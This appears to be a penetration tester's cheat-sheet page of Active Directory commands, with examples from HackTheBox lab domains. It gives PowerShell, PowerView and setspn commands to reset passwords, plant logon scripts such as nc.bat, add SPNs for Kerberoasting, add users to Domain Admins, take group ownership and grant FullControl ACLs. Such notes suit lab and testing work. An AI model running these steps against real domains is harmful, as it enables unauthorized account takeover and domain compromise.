👩‍✈️Active Directory Commands

AD functions performed in different ways.

setadpassword

# MS AD Module
Set-ADAccountPassword -Identity smith -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force)

setadattribute

# MS AD Module
Set-ADUser maria -scriptpath "C:\\programdata\\pc.bat"
Set-ADUser ShriyaB -replace @{'extensionAttribute1' = 'demo text'}
Set-ADUser -Identity maria -ServicePrincipalNames @{Add='MSSQLSvc/object.local:1433'}

# MS setspn.exe
setspn -a MSSQLSvc/object.local:1433 object.local\maria

# Powerview.ps1 Module
Set-DomainObject -Identity maria -SET @{scriptpath = "C:\\programdata\\nc.bat"}

AddAdGroupMember

# MS AD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members maria

# Powerview.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'

# apt install samba
net rpc group members "Network Audit" -U 'm.lovegod' --use-kerberos=required -S dc.absolute.htb

SetAdObjectOwner

# MS AD Module
$user = new-object system.security.principal.ntaccount("htb.local\tom")
Get-ADGroup -filter 'name -like "Backup Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'

AddACLRights

# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object Security.AccessControl.ActiveDirectoryAccessRule('htb.local\Backup_Admins','FullControl');$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}

# Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Backup_Admins" -PrincipalIdentity claire -Rights All

PreviousActive Directory Checklist NextScenarios

Last updated 1 year ago